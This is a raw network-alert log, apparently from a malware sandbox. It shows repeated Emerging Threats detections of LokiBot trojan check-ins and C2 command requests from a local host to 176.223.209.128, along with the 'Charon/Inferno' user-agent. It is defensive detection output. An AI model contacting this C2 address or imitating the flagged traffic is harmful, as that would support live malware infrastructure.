                                              11/25/21-10:53:40.753145TCP2025381ET TROJAN LokiBot Checkin5049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2025381ET TROJAN LokiBot Checkin5050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.238328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050080192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2025381ET TROJAN LokiBot Checkin5050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:41.681848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050180192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2025381ET TROJAN LokiBot Checkin5050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.195313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050280192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2025381ET TROJAN LokiBot Checkin5050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:42.680123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050380192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2025381ET TROJAN LokiBot Checkin5050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.187163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050480192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2025381ET TROJAN LokiBot Checkin5050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:43.695678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050580192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2025381ET TROJAN LokiBot Checkin5050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.139015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2025381ET TROJAN LokiBot Checkin5050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2025381ET TROJAN LokiBot Checkin5050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2025381ET TROJAN LokiBot Checkin5050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2025381ET TROJAN LokiBot Checkin5051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2025381ET TROJAN LokiBot Checkin5051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2025381ET TROJAN LokiBot Checkin5051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2025381ET TROJAN LokiBot Checkin5051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2025381ET TROJAN LokiBot Checkin5051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2025381ET TROJAN LokiBot Checkin5051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2025381ET TROJAN LokiBot Checkin5051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2025381ET TROJAN LokiBot Checkin5051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2025381ET TROJAN LokiBot Checkin5051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2025381ET TROJAN LokiBot Checkin5051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2025381ET TROJAN LokiBot Checkin5052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2025381ET TROJAN LokiBot Checkin5052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2025381ET TROJAN LokiBot Checkin5052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2025381ET TROJAN LokiBot Checkin5052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2025381ET TROJAN LokiBot Checkin5052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2025381ET TROJAN LokiBot Checkin5052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2025381ET TROJAN LokiBot Checkin5052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2025381ET TROJAN LokiBot Checkin5052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2025381ET TROJAN LokiBot Checkin5052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2025381ET TROJAN LokiBot Checkin5052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2025381ET TROJAN LokiBot Checkin5053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2025381ET TROJAN LokiBot Checkin5053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2025381ET TROJAN LokiBot Checkin5053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2025381ET TROJAN LokiBot Checkin5053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2025381ET TROJAN LokiBot Checkin5053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2025381ET TROJAN LokiBot Checkin5053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2025381ET TROJAN LokiBot Checkin5053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2025381ET TROJAN LokiBot Checkin5053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2025381ET TROJAN LokiBot Checkin5053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053880192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2025381ET TROJAN LokiBot Checkin5053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2025381ET TROJAN LokiBot Checkin5054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2025381ET TROJAN LokiBot Checkin5054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2025381ET TROJAN LokiBot Checkin5054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2025381ET TROJAN LokiBot Checkin5054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2025381ET TROJAN LokiBot Checkin5054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2025381ET TROJAN LokiBot Checkin5054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2025381ET TROJAN LokiBot Checkin5054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2025381ET TROJAN LokiBot Checkin5054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2025381ET TROJAN LokiBot Checkin5054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2025381ET TROJAN LokiBot Checkin5054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2025381ET TROJAN LokiBot Checkin5055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2025381ET TROJAN LokiBot Checkin5055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2025381ET TROJAN LokiBot Checkin5055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2025381ET TROJAN LokiBot Checkin5055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2025381ET TROJAN LokiBot Checkin5055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2025381ET TROJAN LokiBot Checkin5055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2025381ET TROJAN LokiBot Checkin5055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2025381ET TROJAN LokiBot Checkin5056080192.168.11.20176.223.209.128
